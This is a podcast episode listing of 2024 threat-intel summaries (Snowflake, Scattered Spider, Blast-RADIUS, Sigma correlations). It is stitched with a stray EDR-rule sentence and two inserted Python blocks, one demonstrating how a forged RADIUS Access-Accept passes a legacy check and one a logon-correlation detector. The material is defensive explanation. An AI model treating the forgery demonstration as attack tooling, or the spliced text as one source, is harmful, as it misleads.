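The same logic maps directly onto an EDR detection rule keyed on parent process, image and command line; the threshold keeps administrators who launch cmd.exe from Win+R out of the alert queue while still catching the mshta variant that carries only one textual indicator.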

The Cybersecurity Defenders Podcast
#171 - Intel Chat: Snowflake, Scattered Spider, CCP, Melofee backdoor, SilkSpecter & Palo Alto Networks
Nov 23, 2024 | 43:29

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. U.S. authorities have identified and charged individuals responsible for a significant data breach involving Snowflake Inc., a major cloud data warehousing company. The breach resulted in the theft of approximately 50 billion records from AT&T, one of Snowflake's prominent clients. U.S. prosecutors have charged five individuals, including 22-year-old Scottish national Tyler Buchanan, for their alleged involvement in the cybercrime group Scattered Spider. This group is accused of executing sophisticated phishing attacks that compromised numerous U.S. companies and individuals, leading to the theft of confidential information and cryptocurrency. Next is an interesting breakdown of the evolving landscape of Chinese state-sponsored cyber threats, which reveals a highly coordinated and multi-layered approach to achieving the strategic objectives of the Chinese Communist Party (CCP). In July 2024, cybersecurity researchers identified a new variant of the Melofee backdoor, a sophisticated malware associated with the Winnti Advanced Persistent Threat group. This variant specifically targets Red Hat Enterprise Linux 7.9 systems and demonstrates enhanced stealth and persistence mechanisms. In early October 2024, cybersecurity analysts identified a phishing campaign targeting e-commerce shoppers in Europe and the USA seeking Black Friday discounts. The campaign, attributed to a financially motivated Chinese threat actor dubbed "SilkSpecter," exploited the surge in online shopping during November's Black Friday season. Palo Alto Networks' Unit 42 has identified exploitation activity targeting two critical vulnerabilities in PAN-OS software: CVE-2024-0012 and CVE-2024-9474.

The Cybersecurity Defenders Podcast
#169 - Intel Chat: Tools, N. Korean IT workers, GootLoader, FakeBat & Pacific Rim
Nov 15, 2024 | 37:42

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. MFASweep is a PowerShell script that attempts to log in to various Microsoft services using a provided set of credentials and will attempt to identify whether MFA is enabled on each. CVE2CAPEC is a tool developed by Galeax that automates the process of mapping Common Vulnerabilities and Exposures (CVEs) to Common Weakness Enumerations (CWEs), Common Attack Pattern Enumeration and Classification (CAPEC), and MITRE ATT&CK techniques. A third tool discussed helps security researchers identify vulnerabilities within macOS's sandbox restrictions, particularly targeting XPC services in the PID domain marked as "Application" services, which often lack adequate protection. Zscaler's recent blog discusses how North Korean IT professionals are increasingly finding remote work in Western companies, often under disguised identities. In a recent campaign, GootLoader malware has been targeting Bengal cat enthusiasts in Australia using SEO poisoning tactics. After a multi-month absence, the malware loader FakeBat, also known as Eugenloader or PaykLoader, has resurfaced, distributing malware through Google Ads, with a recent campaign exploiting ads for the popular app Notion. Over the past five years, Sophos has been engaged in a complex battle against Chinese state-sponsored cyber adversaries targeting its firewall products. This prolonged engagement, detailed in Sophos' "Pacific Rim" report, reveals a series of sophisticated attacks aimed at exploiting vulnerabilities in internet-facing devices, particularly those within critical infrastructure sectors across South and Southeast Asia.

The Cybersecurity Defenders Podcast
#168 - Intel Chat: Latrodectus, WarmCookie, FortiManager, EU's Product Liability Directive & Linus Torvalds
Oct 31, 2024 | 35:24

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. VMRay's analysis of Latrodectus highlights the malware family's development, detailing how it evolved from simple loaders to highly evasive, sophisticated malware. The WarmCookie malware is a recent, persistent threat known for its self-updating capabilities, specifically designed to evade security tools and establish long-term presence in systems. Fortinet recently disclosed a critical zero-day vulnerability in its FortiManager product, assigned CVE-2024-47575, which has been actively exploited in the wild. The European Union (EU) recently updated its product liability framework to better address the challenges of the digital age and support the shift toward a circular economy. Linux creator Linus Torvalds recently reaffirmed the removal of Russian maintainers from the Linux MAINTAINERS file due to sanctions compliance, sparking discussion within the open-source community.

The Cybersecurity Defenders Podcast
#166 - Intel Chat: Microsoft logs, USDoD, SolarWinds WHD & CISA KEV
Oct 24, 2024 | 29:58

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Microsoft has recently confirmed that a software bug caused the loss of more than two weeks' worth of critical security logs from several of its cloud services. Brazil's Federal Police have arrested a hacker suspected to be "USDoD," a notorious cybercriminal involved in several high-profile data breaches. A critical vulnerability has been discovered in SolarWinds' Web Help Desk (WHD) software, involving hardcoded credentials that could be exploited by attackers. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added several critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, signaling that these flaws are being actively used in cyberattacks.

The Cybersecurity Defenders Podcast
#164 - Intel Chat: Wazuh, .io, AI, Discord, Palo Alto & GoldenJackal
Oct 21, 2024 | 40:36

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. A recent malware campaign has been discovered that abuses the open-source Wazuh SIEM agent to deliver a cryptomining payload. There is uncertainty surrounding the .io domain following the UK's decision to return the Chagos Islands, including the British Indian Ocean Territory, to Mauritius. The October 2024 report, "Influence and Cyber Operations," explores how AI is being leveraged by both state and non-state actors in cyber campaigns. Key findings show that AI tools are increasingly being used to enhance traditional cyberattacks, particularly in areas like vulnerability research, malware debugging, and influence operations. Discord has recently been blocked in both Russia and Turkey due to claims of illegal activity on the platform. Palo Alto Networks recently patched several critical vulnerabilities in its Expedition migration tool, which could allow attackers to take control of firewall systems. The most severe flaw, CVE-2024-9463, allows unauthenticated attackers to execute arbitrary OS commands as root, exposing sensitive data like usernames, passwords, and API keys. An article from ESET highlights a cyberespionage campaign conducted by a group known as GoldenJackal, which is targeting government and diplomatic entities, focusing specifically on air-gapped systems in regions such as Europe, the Middle East, and South Asia.

The Cybersecurity Defenders Podcast
#162 - Intel Chat: FIN7, COLDRIVER, perfctl, Comcast & EKUwu
Oct 10, 2024 | 29:45

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Silent Push's recent analysis reveals new tactics by the FIN7 cybercriminal group, which is leveraging AI-based "DeepNude Generators" as part of a phishing campaign to spread malware. Microsoft's Digital Crimes Unit (DCU), in partnership with the U.S. Department of Justice, has taken steps to dismantle cyber operations by Star Blizzard, a Russian state-affiliated actor also known as COLDRIVER. Aqua Security's detailed research on perfctl describes it as a highly stealthy malware that targets Linux servers using a range of sophisticated methods. Comcast recently disclosed that over 237,000 customers had their personal data compromised due to a ransomware attack targeting a former debt collection agency, Financial Business and Consumer Solutions (FBCS). TrustedSec's research on EKUwu sheds light on a significant Active Directory Certificate Services (AD CS) weakness that allows attackers to misuse version 1 certificate templates. Stats on business outcomes after breaches referenced by Matt.

The Cybersecurity Defenders Podcast
#161 - Intel Chat: MSSN CTRL, CRI summit, Shadow AI, More_Eggs, Andariel hacking group & DrayTek routers
Oct 8, 2024 | 40:19

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. The White House recently hosted the International Counter Ransomware Initiative (CRI) summit, bringing together representatives from 68 countries to address the growing global threat of ransomware. The rise of "Shadow AI," which refers to the unauthorized use of AI tools by employees without the oversight of IT departments, poses significant risks for organizations. A new wave of attacks leveraging the More_Eggs backdoor malware has been specifically targeting recruiters. TA4557, a financially motivated group, has been distributing this backdoor since late 2023. The Andariel hacking group, a subgroup of North Korea's Lazarus Group, has turned its attention to financially motivated attacks against U.S. organizations. Forescout Vedere Labs has uncovered 14 vulnerabilities affecting over 700,000 DrayTek routers, with two critical flaws posing significant security risks.

The Cybersecurity Defenders Podcast
#159 - Intel Chat: Sequoia disruption, Github, Supershell, DPRK & Telegram arrest

The Cybersecurity Defenders Podcast

Play Episode Listen Later Sep 30, 2024 38:54


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Apple's release of macOS 15, or Sequoia, has caused significant disruptions for several security tools and software vendors, including CrowdStrike, SentinelOne, Microsoft, and others. Attackers are exploiting GitHub notifications for phishing by sending legitimate-looking alerts with malicious URLs. Truffle Security's research exposes a significant issue in GitHub's handling of deleted and private repository data via Cross Fork Object Reference (CFOR). AhnLab's report details Supershell, a malware targeting Linux SSH servers via brute-force attacks. Since 2022, Mandiant has tracked DPRK IT workers infiltrating global organizations by posing as non-North Koreans to fund the regime's weapons programs and evade sanctions. In August 2024, Telegram CEO Pavel Durov was arrested in France, facing charges for allowing criminal activities to proliferate on the platform, including the distribution of illegal content such as child sexual abuse material.

The Cybersecurity Defenders Podcast
#156 - Intel Chat: Fortibitch, Hadooken, Void Banshee & CloudImposer

The Cybersecurity Defenders Podcast

Play Episode Listen Later Sep 20, 2024 32:27


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. A threat actor calling itself "Fortibitch" claimed to have stolen 440 GB of files from a Fortinet SharePoint instance; Fortinet responded by confirming that the breach involved unauthorized access to files on a third-party cloud-based shared drive, affecting a small portion of customer data. Hackers are targeting Oracle WebLogic servers with a new Linux malware named "Hadooken," which is designed to deploy a cryptominer and facilitate distributed denial-of-service (DDoS) attacks. Microsoft has reclassified a previously patched bug, CVE-2024-43461, as a zero-day vulnerability actively exploited by the "Void Banshee" threat group. Security researchers from Tenable revealed a critical remote code execution vulnerability in Google Cloud Platform, dubbed CloudImposer, that could have allowed attackers to run malicious code on millions of Google's servers.

The Cybersecurity Defenders Podcast
#154 - Intel Chat: Specula, Chromium, Mustang Panda & Service for America

The Cybersecurity Defenders Podcast

Play Episode Listen Later Sep 12, 2024 28:38


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. The Specula C2 framework represents a sophisticated attack method that turns Microsoft Outlook into a command-and-control beacon by abusing its Home Page feature. Attackers abuse browser notifications in Chromium-based browsers by tricking users, through CAPTCHA-like prompts, into enabling notifications. The Biden administration has launched Service for America, an initiative aimed at addressing the growing cybersecurity talent shortage, which has reached critical levels. Mustang Panda, a Chinese state-backed cyber-espionage group, has adapted its tactics by launching a USB-based attack campaign that leverages a worm for self-propagation across air-gapped networks.

The Cybersecurity Defenders Podcast
#153 - Unpacking the hacker mindset with Ken Westin, Senior Solutions Engineer at LimaCharlie

The Cybersecurity Defenders Podcast

Play Episode Listen Later Sep 10, 2024 35:07


On this episode of The Cybersecurity Defenders Podcast, we unpack the hacker mindset with Ken Westin, Senior Solutions Engineer at LimaCharlie. Ken is a seasoned thought leader in cybersecurity who has spent years analyzing and understanding the intricacies of cyber threats and the methods behind them. Ken has a unique ability to identify emerging trends in the industry and to figure out how businesses can protect themselves before they fall victim to attacks. Previous to his current role, Ken was the Field CISO at Panther, where he developed workshops and delivered them around the world. His career also includes significant contributions at Cybereason, Elastic, and Splunk, where he drove security growth, developed innovative tools, and shaped industry conversations on cybersecurity. Ken has been a key spokesperson in the industry, frequently quoted in the media and featured at major conferences like Black Hat and DEF CON. Ken recently joined the team at LimaCharlie as a Senior Solutions Engineer, with the intent to use his deep expertise to help organizations build robust security strategies.
Ken's reading list:
"Daemon" - Daniel Suarez
"Cryptonomicon" - Neal Stephenson
"The Myth of Normal" - Gabor Maté
"Threats: What Every Engineer Should Learn From Star Wars" - Adam Shostack
"The Mitrokhin Archive" - Christopher Andrew & Vasili Mitrokhin
"The Road" - Cormac McCarthy
The song at the end of the podcast: Decrypted Savant - Mercator Misconceptions

The Cybersecurity Defenders Podcast
#152 - Intel Chat: sedexp, Volt Typhoon, Citrine Sleet, Clearview AI & RansomHub?

The Cybersecurity Defenders Podcast

Play Episode Listen Later Sep 5, 2024 37:44


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. A stealthy Linux malware named "sedexp" has been evading detection since 2022 by using a persistence technique (a udev rule) not yet included in the MITRE ATT&CK framework. The Black Lotus Labs team at Lumen Technologies has uncovered a group of hackers linked to the Chinese government that exploited a previously unknown software vulnerability to target U.S. internet service providers. Earlier in August, a North Korean hacking group exploited a previously unknown bug in Chrome-based browsers, aiming to steal cryptocurrency, as reported by Microsoft in a recent update. The Dutch Data Protection Authority, or Dutch DPA, has hit Clearview AI with a €30.5 million fine (about $33.7 million) for illegally collecting data using facial recognition, including photos of Dutch citizens. Energy giant Halliburton has confirmed that its systems were hacked and that intruders were able to steal information following a cyberattack last week.

The Cybersecurity Defenders Podcast
#150 - Intel Chat: Azure MFA, 2.9b records leaked, CVE 9.8 & ransomware record

The Cybersecurity Defenders Podcast

Play Episode Listen Later Aug 23, 2024 37:55


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Starting in October, all Microsoft Azure customers will be required to have multi-factor authentication (MFA) enabled on their accounts. Documents from a lawsuit revealed that over 2.9 billion records are exposed after a massive hack of the Florida-based National Public Data network. Microsoft recently advised of CVE-2024-38063, a critical unauthenticated remote code execution (RCE) vulnerability in the Windows TCP/IP stack that is reachable over IPv6. Ransomware victims have paid $459,800,000 to cybercriminals in the first half of 2024, setting the stage for a new record this year if ransom payments continue at this level.

Perpetual Motion Podcast
LimaCharlie: Cybersecurity – Loud and Clear

Perpetual Motion Podcast

Play Episode Listen Later Aug 15, 2024 53:17


In this episode, Michael Glenn and Colin Fowler speak with Maxime Lamothe-Brassard of LimaCharlie about cybersecurity as a buildable cloud service. Maxime discusses a thoughtful approach to product development that puts cloud service structure into context in terms of both market forces and the historical development of cybersecurity products.“But the fundamental truth behind it is, all of this is just stuff made up by humans to make a system work. And if you read about it and you go and you try to understand it, you can step through it and you can do it.” - Maxime Lamothe-Brassard, Founder & CEO of LimaCharlie

The Cybersecurity Defenders Podcast
#148 - Intel Chat: Hacker Summer Camp, N. Korea, Dispossessor, Proofpoint & Sinkclose

The Cybersecurity Defenders Podcast

Play Episode Listen Later Aug 14, 2024 28:52


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. A heated dispute at DEF CON over this year's custom electronic badges turned physical, leading to an altercation between two attendees. The U.S. Department of Justice has charged Matthew Isaac Knoot, a 38-year-old Nashville resident, with multiple crimes for aiding North Korean IT workers in securing jobs with U.S. and U.K. companies. The FBI has dismantled the infrastructure of the Dispossessor ransomware group, also known as Radar, which had rapidly gained prominence since its inception in August 2023. A critical flaw in Proofpoint's email filtering service was recently discovered, allowing cybercriminals to impersonate major brands and send phishing emails that bypassed Proofpoint's security. A newly discovered security flaw, dubbed Sinkclose, affects AMD processors dating back to 2006. The vulnerability, which impacts CPUs from the Athlon 64 to the Ryzen 7000 series, lets an attacker who already has kernel-level access execute code in System Management Mode (SMM), below the operating system, where it is invisible to security tools and can survive an OS reinstall.

The Cybersecurity Defenders Podcast
#146 - Intel Chat: GhostEmperor, .top, PlugX & Microsoft

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jul 31, 2024 31:39


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. The Chinese hacker group GhostEmperor has re-emerged after a two-year hiatus, displaying new advanced capabilities and sophisticated evasion techniques. The Chinese company Jiangsu Bangning Science & Technology Co., which is in charge of handing out domain names ending in ".top", has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. Following a report by the cybersecurity firm Sekoia.io, which sinkholed a PlugX command-and-control domain, the Paris Public Prosecutor's Office launched a preliminary investigation into a botnet involving millions of global victims, including thousands of machines in France. Microsoft has initiated significant changes to its Windows operating system following a critical incident involving CrowdStrike's kernel driver.

The Cybersecurity Defenders Podcast
#143 - Intel Chat: Blast-RADIUS, Chrome, AT&T, Kaspersky & Crowdstrike

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jul 24, 2024 39:04


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Blast-RADIUS is a vulnerability in the RADIUS protocol that allows a man-in-the-middle attacker to forge valid Access-Accept messages in response to failed authentication requests, using an MD5 chosen-prefix collision against the Response Authenticator that is the only thing protecting the reply when the Message-Authenticator attribute is not required. The blog post on Syntax-Err0r details a technique for silently installing a Chrome extension to maintain persistence, bypassing typical detection methods. American telecom service provider AT&T has confirmed that threat actors managed to access data belonging to "nearly all" of its wireless customers as well as customers of mobile virtual network operators using AT&T's wireless network. The U.S. Department of Commerce added Kaspersky to its Entity List, barring U.S. businesses from engaging with the company due to national security concerns related to the Russian government's influence over Kaspersky's operations. On July 19th CrowdStrike distributed a faulty update to its Falcon sensors that caused widespread problems with computers running Microsoft Windows. As a result, roughly 8.5 million systems crashed, bringing up the feared blue screen of death, in what is being called the largest IT outage in history.
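To make the Blast-RADIUS point concrete, here is an added example (written for this page, not code from the podcast or from the Blast-RADIUS researchers) that builds RADIUS responses the way RFC 2865 and RFC 2869 describe them and shows the two checks a NAS can run: the plain MD5 Response Authenticator, which is all a legacy NAS verifies, and the keyed Message-Authenticator (HMAC-MD5 with the shared secret) that vendors now require. The shared secret, packet contents and identifiers are constructed; the forged Access-Accept is built with the secret only to stand in for the outcome of a successful MD5 collision, since the attacker in the real attack never learns the secret.

```python
"""Added illustration: why a RADIUS Response Authenticator alone is forgeable
and why requiring Message-Authenticator stops the forgery. All values are
constructed for the example."""
import hashlib
import hmac
import os
import struct

SECRET = b"constructed-shared-secret"          # assumed NAS/server shared secret
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, PROXY_STATE, MESSAGE_AUTHENTICATOR = 1, 33, 80


def encode_attrs(attrs):
    """RADIUS attributes are TLVs: type(1) | length(1, header included) | value."""
    return b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)


def build_packet(code, ident, authenticator, attrs):
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body


def response_authenticator(code, ident, request_auth, attrs):
    """RFC 2865 s.3: MD5(Code | ID | Length | RequestAuth | Attributes | Secret).
    This one unkeyed-looking MD5 is all that authenticates an Accept/Reject to
    a legacy NAS; Blast-RADIUS forges it with a chosen-prefix collision placed
    in attacker-controlled Proxy-State bytes."""
    body = encode_attrs(attrs)
    header = struct.pack("!BBH", code, ident, 20 + len(body))
    return hashlib.md5(header + request_auth + body + SECRET).digest()


def message_authenticator(code, ident, request_auth, attrs):
    """RFC 2869 s.5.14 for responses: HMAC-MD5(secret) over Code | ID | Length |
    RequestAuthenticator | Attributes, with the Message-Authenticator value
    zeroed. An MD5 collision does not help against an HMAC keyed with a secret
    the attacker cannot evaluate."""
    zeroed = [(t, bytes(16) if t == MESSAGE_AUTHENTICATOR else v) for t, v in attrs]
    return hmac.new(SECRET, build_packet(code, ident, request_auth, zeroed), hashlib.md5).digest()


def parse_packet(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    attrs, pos = [], 20
    while pos < length:
        t, ln = pkt[pos], pkt[pos + 1]
        attrs.append((t, pkt[pos + 2:pos + ln]))
        pos += ln
    return code, ident, pkt[4:20], attrs


def server_reply(code, ident, request_auth, attrs, sign):
    """Server side. sign=True appends Message-Authenticator (the mitigation)."""
    if sign:
        placeholder = attrs + [(MESSAGE_AUTHENTICATOR, bytes(16))]
        mac = message_authenticator(code, ident, request_auth, placeholder)
        attrs = attrs + [(MESSAGE_AUTHENTICATOR, mac)]
    return build_packet(code, ident, response_authenticator(code, ident, request_auth, attrs), attrs)


def client_accepts(pkt, request_auth, require_mac):
    """NAS side. True only if the NAS would trust this response."""
    code, ident, auth, attrs = parse_packet(pkt)
    if not hmac.compare_digest(auth, response_authenticator(code, ident, request_auth, attrs)):
        return False
    macs = [v for t, v in attrs if t == MESSAGE_AUTHENTICATOR]
    if not macs:
        return not require_mac            # hardened NAS refuses unsigned responses
    return hmac.compare_digest(macs[0], message_authenticator(code, ident, request_auth, attrs))


def scenario(require_mac):
    """Returns (legit_accept_ok, forged_accept_ok) for a NAS that does or does
    not require Message-Authenticator. `forged` stands in for the collision
    outcome: a Response Authenticator that verifies without the attacker ever
    holding the secret (here it is simply computed with it)."""
    ident, request_auth = 7, os.urandom(16)
    attrs = [(USER_NAME, b"alice"), (PROXY_STATE, b"attacker-chosen-bytes")]
    legit = server_reply(ACCESS_ACCEPT, ident, request_auth, attrs, sign=True)
    forged = server_reply(ACCESS_ACCEPT, ident, request_auth, attrs, sign=False)
    return client_accepts(legit, request_auth, require_mac), client_accepts(forged, request_auth, require_mac)


if __name__ == "__main__":
    print("legacy NAS   (legit, forged):", scenario(require_mac=False))   # (True, True)
    print("hardened NAS (legit, forged):", scenario(require_mac=True))    # (True, False)
```

The check that matters operationally is the one in `client_accepts`: a NAS that only recomputes the Response Authenticator accepts the forged Accept, while one that insists on a valid Message-Authenticator rejects it, which is why the fix is to require that attribute on both ends rather than to change the hash alone.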

The Cybersecurity Defenders Podcast
#140 - Intel Chat: 10bn Pwds, Eldorado RaaS, 840Mpps DDoS, regreSSHion & $1.4bn in stolen crypto

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jul 10, 2024 27:55


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Likely the biggest password leak ever: nearly 10 billion credentials exposed. Eldorado is a newly discovered ransomware-as-a-service operation targeting both Windows and Linux systems. OVHcloud has reported mitigating a record-breaking distributed denial-of-service attack that peaked at 840 million packets per second. Cisco has issued a warning about a critical remote code execution vulnerability named "regreSSHion," tracked as CVE-2024-6387, affecting OpenSSH on glibc-based Linux systems. In the first half of 2024, cryptocurrency thefts amounted to $1.4 billion, significantly driven by rising crypto prices and a few large-scale attacks.

The Cybersecurity Defenders Podcast
#139 - Intel Chat: MOVEit, P2PInfect, polyfill.io & TeamViewer

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jul 4, 2024 25:40


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. A high-severity security vulnerability in Progress Software's MOVEit Transfer software could allow cyberattackers to get around the platform's authentication mechanisms, and it was spotted being actively exploited in the wild just hours after it was made public. A new version of the P2P worm P2PInfect, which targets Redis servers running on both Linux and Windows systems and aims to deploy both ransomware and cryptocurrency-mining payloads, is out in the wild. The polyfill.io domain, used to provide backward compatibility for older browsers, has been shut down amid accusations of malicious activity after recently being acquired by Chinese firm Funnull; it was allegedly redirecting users to malicious sites and employing evasion techniques. The Germany-based company behind the world-famous remote desktop software TeamViewer has confirmed that in 2016 TeamViewer software was compromised.

The Cybersecurity Defenders Podcast
#135 - Intel Chat: Sigma, Scattered Spider, Microsoft, Empire Market & UNC3886

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jun 21, 2024 36:26


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. SigmaHQ has introduced Sigma Correlations to enhance its rule-based detection capabilities, allowing for more sophisticated event correlation across multiple Sigma rules. Tyler Buchanan, a 22-year-old from the UK and alleged leader of the Scattered Spider hacking group, was arrested in Spain. Microsoft has issued an urgent update for all supported versions of Windows to address a critical Wi-Fi vulnerability, CVE-2024-30078. Three individuals, Yousef Selassie, Ugochukwu Emmanuel Nwosu, and David Gil, have been charged with operating Empire Market, a dark web marketplace that facilitated over $430 million in illegal transactions. In September 2022, Mandiant began investigating several intrusions conducted by UNC3886, a China-linked cyber espionage group, after discovering malware in ESXi hypervisors.
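To show what "correlation across multiple Sigma rules" buys a detection engineer, here is an added example written for this page (it is not SigmaHQ's code or pySigma, and it only covers two of the correlation types): a small evaluator for rule documents shaped like Sigma's correlation schema (type, rules, group-by, timespan, condition), run over a handful of constructed Windows logon events. The base rule names `failed_logon` and `successful_logon`, the event field names and the timestamps are all assumptions made for the example.

```python
"""Added illustration of Sigma-style correlation rules (event_count and
temporal) over constructed Security-log events. Simplified stand-alone code
written for this page, not the SigmaHQ implementation."""
from collections import defaultdict
from datetime import datetime, timedelta

# Base detections the correlation refers to by name (assumed rule names).
BASE_RULES = {
    "failed_logon": lambda e: e["EventID"] == 4625,
    "successful_logon": lambda e: e["EventID"] == 4624,
}


def parse_timespan(text):
    """'5m' -> timedelta; units s/m/h/d as in Sigma correlation timespans."""
    units = {"s": 1, "m": 60, "h": 3600, "d": 86400}
    return timedelta(seconds=int(text[:-1]) * units[text[-1]])


def _grouped_matches(events, rule_names, group_by):
    """Map group key -> time-sorted [(timestamp, rule_name)] for events matching any listed rule."""
    groups = defaultdict(list)
    for e in events:
        for name in rule_names:
            if BASE_RULES[name](e):
                groups[tuple(e[f] for f in group_by)].append((e["ts"], name))
    for items in groups.values():
        items.sort()
    return groups


def event_count(events, corr):
    """event_count: at least `gte` matches per group inside a sliding window of
    `timespan` (a fixed bucket would miss a burst straddling its boundary)."""
    span, gte = parse_timespan(corr["timespan"]), corr["condition"]["gte"]
    hits = []
    for key, items in _grouped_matches(events, corr["rules"], corr["group-by"]).items():
        times = [t for t, _ in items]
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > span:
                start += 1
            if end - start + 1 >= gte:
                hits.append(key)
                break
    return hits


def temporal(events, corr):
    """temporal: every listed rule fires at least once for the same group within `timespan`."""
    span, wanted = parse_timespan(corr["timespan"]), set(corr["rules"])
    hits = []
    for key, items in _grouped_matches(events, corr["rules"], corr["group-by"]).items():
        for i, (t0, _) in enumerate(items):
            seen = {name for t, name in items[i:] if t - t0 <= span}
            if wanted <= seen:
                hits.append(key)
                break
    return hits


def evaluate(rule_doc, events):
    """Dispatch on the correlation type; returns the group keys that alert."""
    corr = rule_doc["correlation"]
    return {"event_count": event_count, "temporal": temporal}[corr["type"]](events, corr)


# Two correlation rules in the shape of the Sigma YAML, written as Python dicts.
BRUTE_FORCE = {"title": "10+ failed logons for one user in 5 minutes",
               "correlation": {"type": "event_count", "rules": ["failed_logon"],
                               "group-by": ["User"], "timespan": "5m",
                               "condition": {"gte": 10}}}
SPRAY_THEN_SUCCESS = {"title": "Failed logons and a success for one user in 5 minutes",
                      "correlation": {"type": "temporal",
                                      "rules": ["failed_logon", "successful_logon"],
                                      "group-by": ["User"], "timespan": "5m"}}


def sample_events():
    """Constructed events: alice fails 10 times in 90 s then succeeds, bob fails 3 times, carol just logs in."""
    t0 = datetime(2024, 6, 21, 9, 0, 0)
    ev = [{"ts": t0 + timedelta(seconds=10 * i), "EventID": 4625, "User": "alice"} for i in range(10)]
    ev.append({"ts": t0 + timedelta(seconds=120), "EventID": 4624, "User": "alice"})
    ev += [{"ts": t0 + timedelta(seconds=30 * i), "EventID": 4625, "User": "bob"} for i in range(3)]
    ev.append({"ts": t0 + timedelta(seconds=10), "EventID": 4624, "User": "carol"})
    return ev


if __name__ == "__main__":
    for rule in (BRUTE_FORCE, SPRAY_THEN_SUCCESS):
        print(rule["title"], "->", evaluate(rule, sample_events()))   # both: [('alice',)]
```

Neither base rule alerts on its own at a sensible threshold; the correlation layer is what turns "a 4625" and "a 4624" into "a spray that landed," and the group-by field is what keeps bob's three failures from being lumped in with alice's ten.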

The Cybersecurity Defenders Podcast
#133 - Intel Chat: Snowflake, Operation Endgame, Android spoof & Operation Crimson Palace

The Cybersecurity Defenders Podcast

Play Episode Listen Later Jun 13, 2024 25:37


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Mandiant has linked a series of data breaches affecting hundreds of Snowflake instances to the use of infostealer malware, which primarily harvested credentials from non-Snowflake systems. Authorities have ramped up Operation Endgame, an effort that now includes capturing an individual who goes by the handle "Odd," the alleged mastermind behind the Emotet botnet. McAfee has identified a fake Bahrain government Android app masquerading as the Labour Market Regulatory Authority app, designed to steal personal data for financial fraud. A technical deep-dive on Operation Crimson Palace by Sophos X-Ops exposes a sophisticated cyberespionage campaign targeting a Southeast Asian government, attributed to Chinese state interests.

The Cybersecurity Defenders Podcast
#129 - Intel Chat: MSSN CTRL, GhostEngine, MITRE & BreachForums

The Cybersecurity Defenders Podcast

Play Episode Listen Later May 30, 2024 22:56


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. Researchers have identified a new malware, called "GhostEngine," which abuses vulnerable drivers to disable endpoint detection and response solutions before deploying a cryptominer. MITRE has released more details on how Chinese state-sponsored hackers recently exploited VMware systems within MITRE's NERVE environment for persistence and evasion. The FBI has once again seized control of BreachForums, a notorious site known for trading stolen data, marking the second such action within a year. Information on MSSN CTRL, the security automation and engineering conference, can be found here.

Paul's Security Weekly
This Week: short on funding, long on research and analysis & RSAC Interviews - ESW #363

Paul's Security Weekly

Play Episode Listen Later May 24, 2024 159:17


Only one funding announcement this week, so we dive deep into Thoma Bravo's past and present portfolio. They recently announced a sale of Venafi to Cyberark and no one is quite sure how much of a hand they had in the LogRhythm/Exabeam merger, and whether or not they sold their stake in the process. We also have a crazy stat Ross Haleliuk spotted in Bessemer's analysis: "13 out of 14 cybersecurity companies acquired in the past year for over $100M were from Israel". Is this an anomaly? Does it just mean that Israel wasn't shy about selling when the market was down? We discuss. A number of new product announcements continue to trickle out post-RSA. We'll also discuss Sam Altman and OpenAI's decision to use Scarlett Johansson's voice against her will and what it could mean for deepfakes, advanced social engineering techniques, and general big tech sliminess. Do you know what a "product glorifier" is? How about a glowstacker? You will if you check out the second-to-last story in the show notes! See the show notes for individual descriptions on each RSAC interview. This week, we feature speakers from Sailpoint, Okta, Ping Identity, LimaCharlie, QwietAI, and Picus! Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-363

The Cybersecurity Defenders Podcast
#127 - Intel Chat: Alabuga Leaks, LockBit, EBury, E2EE & Dropbox

The Cybersecurity Defenders Podcast

Play Episode Listen Later May 24, 2024 26:42


